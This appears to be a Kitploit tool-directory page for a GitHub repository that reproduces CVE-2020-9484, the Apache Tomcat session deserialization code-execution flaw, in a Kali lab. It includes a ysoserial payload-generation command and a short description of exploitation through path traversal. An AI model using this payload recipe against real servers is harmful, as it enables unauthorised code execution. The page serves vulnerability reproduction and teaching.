Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-9484 — 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 | Kitploit
Tools/GitHubGitHub/idealdreamlast/cve-2020-9484
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubidealdreamlast/cve-2020-9484

CVE-2020-9484

用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞

View Repository
522016 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-9484

Reproduce Apache Tomcat Session Deserialization Code Execution Vulnerability CVE-2020-9484 with Kali 2.0

Environment:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (webapp is s2-053, added commons-collections4-4.0.jar under its lib)

Start

/yourtomcatdir/bin/startup.sh image

Generate Payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

Exploitation

First visit S2-053 to check if it started normally: http://192.168.152.128:8080/s2-053/ image
Re-access and capture packets, use intruder for path traversal image
image


Command executed successfully:

Reference: https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
image


Download Tool